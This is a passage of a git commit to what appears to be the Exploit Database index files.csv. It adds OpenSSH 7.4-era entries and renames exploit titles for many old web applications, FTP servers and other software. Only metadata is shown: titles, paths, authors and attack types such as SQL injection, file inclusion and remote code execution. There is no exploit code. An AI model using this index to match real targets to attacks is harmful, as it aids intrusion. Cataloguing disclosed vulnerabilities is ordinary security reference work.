DB: 2016-12-24
3 new exploits WinFTP Server 2.0.2 - (PASV) Remote Denial of Service WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service WinFTP Server 2.3.0 - (NLST) Denial of Service WinFTP Server 2.3.0 - 'NLST' Denial of Service vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC) vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC) OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit) X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit) OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading X7 Chat 2.0 - (help_file) Remote Command Execution X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution Ultimate WebBoard 3.00 - (Category) SQL Injection PromoteWeb MySQL - 'go.php id' SQL Injection 212Cafe Board 0.07 - (view.php qID) SQL Injection Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection PromoteWeb MySQL - 'id' Parameter SQL Injection 212Cafe Board 0.07 - 'qID' Parameter SQL Injection The Gemini Portal - 'lang' Remote File Inclusion RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection ASPapp KnowledgeBase - 'catid' SQL Injection The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection ASPapp KnowledgeBase - 'catid' Parameter SQL Injection X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion CoAST 0.95 - (sections_file) Remote File Inclusion Real Estate Manager - 'cat_id' SQL Injection LnBlog 0.9.0 - (plugin) Local File Inclusion PlugSpace 0.1 - (index.php navi) Local File Inclusion MyCard 1.0.2 - (gallery.php id) SQL Injection PowerPortal 2.0.13 - 'path' Local Directory Traversal PHP-Lance 1.52 - (show.php catid) SQL Injection Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion PlugSpace 0.1 - 'navi' Parameter Local File Inclusion MyCard 1.0.2 - 'id' Parameter SQL Injection PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal PHP-Lance 1.52 - 'catid' Parameter SQL Injection Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection Pro Chat Rooms 3.0.3 - (guid) SQL Injection Pilot Group eTraining - 'news_read.php id' SQL Injection BbZL.php 0.92 - (lien_2) Local Directory Traversal Pro Chat Rooms 3.0.3 - SQL Injection Pilot Group eTraining - 'news_read.php' SQL Injection BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal Arcadem Pro - 'articlecat' SQL Injection Arcadem Pro - 'articlecat' Parameter SQL Injection ArabCMS - 'rss.php rss' Local File Inclusion FAQ Management Script - 'catid' SQL Injection ArabCMS - 'rss.php' Local File Inclusion FAQ Management Script - 'catid' Parameter SQL Injection BookMarks Favourites Script - 'view_group.php id' SQL Injection BookMarks Favourites Script - 'id' Parameter SQL Injection BMForum 5.6 - (tagname) SQL Injection BMForum 5.6 - 'tagname' Parameter SQL Injection Crux Gallery 1.32 - (index.php theme) Local File Inclusion phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution RPortal 1.1 - (file_op) Remote File Inclusion Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution RPortal 1.1 - 'file_op' Parameter Remote File Inclusion Link Trader - 'ratelink.php lnkid' SQL Injection Link Trader - 'lnkid' Parameter SQL Injection OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion OpenX 2.6 - (ac.php bannerid) Blind SQL Injection OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection X7 Chat 2.0.5 - Authentication Bypass Arcadem Pro 2.8 - (article) Blind SQL Injection Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection Link Trader - (lnkid) SQL Injection phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit) phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit) PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting BMForum 3.0 - 'topic.php' Cross-Site Scripting BMForum 3.0 - 'forums.php' Cross-Site Scripting BMForum 3.0 - 'post.php' Cross-Site Scripting BMForum 3.0 - 'announcesys.php' Cross-Site Scripting PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting BMForum 5.6 - 'index.php' Cross-Site Scripting BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting Pilot Group eTraining - 'news_read.php' Cross-Site Scripting Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting Apache mod_session_crypto - Padding Oracle
This commit is contained in:
parent
26b1e8b6ad
commit
897e1fa191
6 changed files with 639 additions and 93 deletions
114
files.csv
114
files.csv
|
@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
|
|||
2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control - 'ole32.dll' Denial of Service",2006-12-18,shinnai,windows,dos,0
|
||||
2947,platforms/multiple/dos/2947.pl,"wget 1.10.2 - (Unchecked Boundary Condition) Denial of Service",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0
|
||||
2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption",2006-12-19,"Breno Silva Pinto",multiple,dos,0
|
||||
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - (PASV) Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
|
||||
2952,platforms/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,windows,dos,0
|
||||
2954,platforms/linux/dos/2954.html,"KDE libkhtml 3.5 < 4.2.0 - Unhandled HTML Parse Exception Exploit",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0
|
||||
2961,platforms/hardware/dos/2961.py,"Hewlett-Packard (HP) FTP Print Server 2.4.5 - Buffer Overflow (PoC)",2006-12-19,"Joxean Koret",hardware,dos,0
|
||||
2966,platforms/windows/dos/2966.html,"RealPlayer 10.5 - (ActiveX Control) Denial of Service",2006-12-20,shinnai,windows,dos,0
|
||||
|
@ -801,7 +801,7 @@ id,file,description,date,author,platform,type,port
|
|||
6554,platforms/windows/dos/6554.html,"Google Chrome - Carriage Return Null Object Memory Exhaustion",2008-09-24,"Aditya K Sood",windows,dos,0
|
||||
6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - '.doc' File Local Denial of Service (PoC)",2008-09-25,securfrog,windows,dos,0
|
||||
6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0
|
||||
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - (NLST) Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
|
||||
6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0
|
||||
6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0
|
||||
6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0
|
||||
6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0
|
||||
|
@ -811,7 +811,7 @@ id,file,description,date,author,platform,type,port
|
|||
6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - PoC (MS08-052)",2008-09-28,"John Smith",windows,dos,0
|
||||
6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0
|
||||
6647,platforms/windows/dos/6647.c,"ESET SysInspector 1.1.1.0 - 'esiadrv.sys' (PoC)",2008-10-01,"NT Internals",windows,dos,0
|
||||
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - CWD command Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
|
||||
6651,platforms/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",windows,dos,0
|
||||
6654,platforms/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,windows,dos,0
|
||||
6658,platforms/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service",2008-10-03,LiquidWorm,windows,dos,0
|
||||
6660,platforms/windows/dos/6660.txt,"Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service",2008-10-03,dmnt,windows,dos,0
|
||||
|
@ -8733,6 +8733,7 @@ id,file,description,date,author,platform,type,port
|
|||
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
|
||||
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
|
||||
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
|
||||
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -14517,7 +14518,7 @@ id,file,description,date,author,platform,type,port
|
|||
35170,platforms/hardware/remote/35170.txt,"Lexmark X651de - Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0
|
||||
35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0
|
||||
35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0
|
||||
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - lib/message.php preg_replace() PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
|
||||
35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
|
||||
35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
|
||||
35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
|
||||
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
|
||||
|
@ -15192,6 +15193,7 @@ id,file,description,date,author,platform,type,port
|
|||
40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
|
||||
40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
|
||||
40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80
|
||||
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -16171,7 +16173,7 @@ id,file,description,date,author,platform,type,port
|
|||
1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote File Inclusion",2006-04-30,Aesthetico,php,webapps,0
|
||||
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - 'lostpw.php' Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
|
||||
1733,platforms/php/webapps/1733.pl,"Invision Power Board 2.1.5 - (from_contact) SQL Injection",2006-05-01,"Ykstortion Security",php,webapps,0
|
||||
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
|
||||
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - 'help_file' Parameter Remote Command Execution",2006-05-02,rgod,php,webapps,0
|
||||
1740,platforms/php/webapps/1740.pl,"Fast Click 1.1.3 / 2.3.8 - (show.php) Remote File Inclusion",2006-05-02,R@1D3N,php,webapps,0
|
||||
1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0
|
||||
1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
|
||||
|
@ -19544,69 +19546,69 @@ id,file,description,date,author,platform,type,port
|
|||
6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 - 'FCKeditor' Arbitrary File Upload",2008-09-25,Stack,php,webapps,0
|
||||
6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection",2008-09-26,Stack,php,webapps,0
|
||||
6575,platforms/php/webapps/6575.txt,"barcodegen 2.0.0 - 'class_dir' Parameter Remote File Inclusion",2008-09-26,"Br0k3n H34rT",php,webapps,0
|
||||
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - (Category) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'go.php id' SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - (view.php qID) SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6576,platforms/php/webapps/6576.txt,"Ultimate WebBoard 3.00 - 'Category' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL - 'id' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6578,platforms/php/webapps/6578.txt,"212Cafe Board 0.07 - 'qID' Parameter SQL Injection",2008-09-26,"CWH Underground",php,webapps,0
|
||||
6579,platforms/php/webapps/6579.txt,"Libra PHP File Manager 1.18 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
|
||||
6580,platforms/php/webapps/6580.txt,"Atomic Photo Album 1.1.0pre4 - Insecure Cookie Handling",2008-09-26,Stack,php,webapps,0
|
||||
6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project 2.6.2 - Insecure Cookie Handling",2008-09-26,ZoRLu,php,webapps,0
|
||||
6584,platforms/php/webapps/6584.txt,"The Gemini Portal 4.7 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
|
||||
6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 - Remote File Inclusion",2008-09-26,Crackers_Child,php,webapps,0
|
||||
6586,platforms/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,php,webapps,0
|
||||
6587,platforms/php/webapps/6587.txt,"The Gemini Portal - 'lang' Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
|
||||
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - (showtopic) SQL Injection",2008-09-26,0x90,php,webapps,0
|
||||
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
|
||||
6587,platforms/php/webapps/6587.txt,"The Gemini Portal 4.7 - 'lang' Parameter Remote File Inclusion",2008-09-26,ZoRLu,php,webapps,0
|
||||
6589,platforms/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' Parameter SQL Injection",2008-09-26,0x90,php,webapps,0
|
||||
6590,platforms/php/webapps/6590.txt,"ASPapp KnowledgeBase - 'catid' Parameter SQL Injection",2008-09-27,Crackers_Child,php,webapps,0
|
||||
6591,platforms/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,php,webapps,0
|
||||
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - (mini.php help_file) Local File Inclusion",2008-09-27,NoGe,php,webapps,0
|
||||
6592,platforms/php/webapps/6592.txt,"X7 Chat 2.0.1A1 - 'mini.php' Local File Inclusion",2008-09-27,NoGe,php,webapps,0
|
||||
6593,platforms/php/webapps/6593.txt,"Vbgooglemap Hotspot Edition 1.0.3 - SQL Injection",2008-09-27,elusiven,php,webapps,0
|
||||
6594,platforms/php/webapps/6594.txt,"Camera Life 2.6.2b4 - Arbitrary File Upload",2008-09-27,Mi4night,php,webapps,0
|
||||
6595,platforms/php/webapps/6595.txt,"Joovili 3.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
|
||||
6596,platforms/php/webapps/6596.txt,"E-Uploader Pro 1.0 - Multiple SQL Injections",2008-09-27,~!Dok_tOR!~,php,webapps,0
|
||||
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - (sections_file) Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
|
||||
6599,platforms/php/webapps/6599.txt,"Real Estate Manager - 'cat_id' SQL Injection",2008-09-27,CraCkEr,php,webapps,0
|
||||
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - (plugin) Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - (index.php navi) Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - (gallery.php id) SQL Injection",2008-09-27,r45c4l,php,webapps,0
|
||||
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
|
||||
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - (show.php catid) SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
|
||||
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - (itpm_estimate.php a) Remote Code Execution",2008-09-27,dun,php,webapps,0
|
||||
6598,platforms/php/webapps/6598.txt,"CoAST 0.95 - 'sections_file' Parameter Remote File Inclusion",2008-09-27,DaRkLiFe,php,webapps,0
|
||||
6599,platforms/php/webapps/6599.txt,"Real Estate Manager 1.01 - 'cat_id' Parameter SQL Injection",2008-09-27,CraCkEr,php,webapps,0
|
||||
6601,platforms/php/webapps/6601.txt,"LnBlog 0.9.0 - 'plugin' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 - 'navi' Parameter Local File Inclusion",2008-09-27,dun,php,webapps,0
|
||||
6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 - 'id' Parameter SQL Injection",2008-09-27,r45c4l,php,webapps,0
|
||||
6604,platforms/php/webapps/6604.txt,"PowerPortal 2.0.13 - 'path' Parameter Local Directory Traversal",2008-09-27,r45c4l,php,webapps,0
|
||||
6605,platforms/php/webapps/6605.txt,"PHP-Lance 1.52 - 'catid' Parameter SQL Injection",2008-09-27,InjEctOr5,php,webapps,0
|
||||
6606,platforms/php/webapps/6606.txt,"Yoxel 1.23beta - 'itpm_estimate.php' Remote Code Execution",2008-09-27,dun,php,webapps,0
|
||||
6607,platforms/php/webapps/6607.txt,"X7 Chat 2.0.1A1 - Local File Inclusion",2008-09-27,JIKO,php,webapps,0
|
||||
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - (bannerclick.php adid) SQL Injection",2008-09-28,"Hussin X",php,webapps,0
|
||||
6608,platforms/php/webapps/6608.txt,"ZEELYRICS 2.0 - 'bannerclick.php' SQL Injection",2008-09-28,"Hussin X",php,webapps,0
|
||||
6610,platforms/asp/webapps/6610.txt,"ParsaWeb CMS - 'Search' SQL Injection",2008-09-28,BugReport.IR,asp,webapps,0
|
||||
6611,platforms/php/webapps/6611.php,"PHPcounter 1.3.2 - 'index.php' SQL Injection",2008-09-28,StAkeR,php,webapps,0
|
||||
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - (guid) SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
|
||||
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php id' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
|
||||
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - (lien_2) Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
|
||||
6612,platforms/php/webapps/6612.txt,"Pro Chat Rooms 3.0.3 - SQL Injection",2008-09-28,~!Dok_tOR!~,php,webapps,0
|
||||
6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining - 'news_read.php' SQL Injection",2008-09-28,S.W.A.T.,php,webapps,0
|
||||
6617,platforms/php/webapps/6617.txt,"BbZL.php 0.92 - 'lien_2' Parameter Local Directory Traversal",2008-09-28,JIKO,php,webapps,0
|
||||
6618,platforms/php/webapps/6618.txt,"Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal",2008-09-28,Cr@zy_King,php,webapps,0
|
||||
6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks - 'linkid' Parameter SQL Injection",2008-09-28,boom3rang,php,webapps,0
|
||||
6621,platforms/php/webapps/6621.txt,"BbZL.php 0.92 - Insecure Cookie Handling",2008-09-28,Stack,php,webapps,0
|
||||
6623,platforms/php/webapps/6623.txt,"events Calendar 1.1 - Remote File Inclusion",2008-09-29,"k3vin mitnick",php,webapps,0
|
||||
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' SQL Injection",2008-09-29,"Hussin X",php,webapps,0
|
||||
6624,platforms/php/webapps/6624.txt,"Arcadem Pro - 'articlecat' Parameter SQL Injection",2008-09-29,"Hussin X",php,webapps,0
|
||||
6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 - Insecure Cookie Handling",2008-09-29,Crackers_Child,php,webapps,0
|
||||
6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script - Multiple SQL Injections",2008-09-29,"Super Cristal",php,webapps,0
|
||||
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php rss' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
|
||||
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6628,platforms/php/webapps/6628.txt,"ArabCMS - 'rss.php' Local File Inclusion",2008-09-29,JIKO,php,webapps,0
|
||||
6629,platforms/php/webapps/6629.txt,"FAQ Management Script - 'catid' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection / Local File Inclusion",2008-09-30,SirGod,php,webapps,0
|
||||
6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 - Multiple Remote File Inclusion",2008-09-30,DaRkLiFe,php,webapps,0
|
||||
6633,platforms/php/webapps/6633.txt,"eFront 3.5.1 / build 2710 - Arbitrary File Upload",2008-09-30,Pepelux,php,webapps,0
|
||||
6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection",2008-09-30,Stack,php,webapps,0
|
||||
6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 - Insecure Cookie Handling",2008-09-30,Stack,php,webapps,0
|
||||
6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Blind SQL Injection",2008-09-30,ka0x,php,webapps,0
|
||||
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'view_group.php id' SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script - 'id' Parameter SQL Injection",2008-09-30,"Hussin X",php,webapps,0
|
||||
6639,platforms/php/webapps/6639.txt,"Pritlog 0.4 - 'Filename' Remote File Disclosure",2008-09-30,Pepelux,php,webapps,0
|
||||
6640,platforms/php/webapps/6640.pl,"ADN Forum 1.0b - Blind SQL Injection",2008-10-01,StAkeR,php,webapps,0
|
||||
6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin 1.5.5 - 'cookie' Local File Inclusion",2008-10-01,JosS,php,webapps,0
|
||||
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - (tagname) SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6642,platforms/php/webapps/6642.txt,"BMForum 5.6 - 'tagname' Parameter SQL Injection",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 - Multiple SQL Injections",2008-10-01,~!Dok_tOR!~,php,webapps,0
|
||||
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - (index.php theme) Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
|
||||
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - (reserve.php) Remote Code Execution",2008-10-01,EgiX,php,webapps,0
|
||||
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - (file_op) Remote File Inclusion",2008-10-01,Kad,php,webapps,0
|
||||
6645,platforms/php/webapps/6645.txt,"Crux Gallery 1.32 - 'theme' Parameter Local File Inclusion",2008-10-01,StAkeR,php,webapps,0
|
||||
6646,platforms/php/webapps/6646.php,"phpScheduleIt 1.2.10 - 'reserve.php' Remote Code Execution",2008-10-01,EgiX,php,webapps,0
|
||||
6648,platforms/php/webapps/6648.txt,"RPortal 1.1 - 'file_op' Parameter Remote File Inclusion",2008-10-01,Kad,php,webapps,0
|
||||
6649,platforms/php/webapps/6649.txt,"phpscripts Ranking Script - Insecure Cookie Handling",2008-10-01,Crackers_Child,php,webapps,0
|
||||
6650,platforms/php/webapps/6650.txt,"Link Trader - 'ratelink.php lnkid' SQL Injection",2008-10-01,"Hussin X",php,webapps,0
|
||||
